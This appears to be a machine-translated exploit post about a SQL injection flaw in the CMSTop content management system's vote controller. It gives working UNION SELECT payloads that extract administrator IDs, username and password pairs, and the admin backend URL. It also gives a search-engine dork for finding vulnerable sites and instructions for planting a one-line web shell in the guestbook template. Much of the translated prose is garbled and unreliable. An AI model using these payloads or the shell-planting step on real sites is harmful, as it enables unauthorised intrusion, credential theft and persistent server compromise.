Play for a few months this vulnerability.
See the nine zones there ztz large cattle released out exp.
漏洞 文件 /apps/vote/controller/vote.php
app.xxx.com/?app=vote&controller=vote&action=total&contentid=1
To obtain an administrator id
? app=vote&controller=vote&action=total&contentid=1 and 1=2 union select userid from cmstop_admin where departmentid=2 limit 0,1;#
Get to the bottom management id is what you write yourself?
? app=vote&controller=vote&action=total&contentid=1 and 1=2 union select concat(username,char(0x3d),password) from cmstop_member where userid=1;#
Read background address
? app=vote&controller=vote&action=total&contentid=1%20and%2 0 1=2%20union%20select%20url%20from%20cmstop_mymenu%20where%2 0 1=1%20limit%200,1;%2 3
cmstop only app this a Live script
About how to find this dynamic Station
site:xxx.com inurl:roll.php
Database file
cmstop/config/db.php
About to get shell
The administrator account into the background directly after the template inside the guestbook template is inserted in a word
然后 访问 app.xxx.com/?app=guestbook
Large cow study on the go.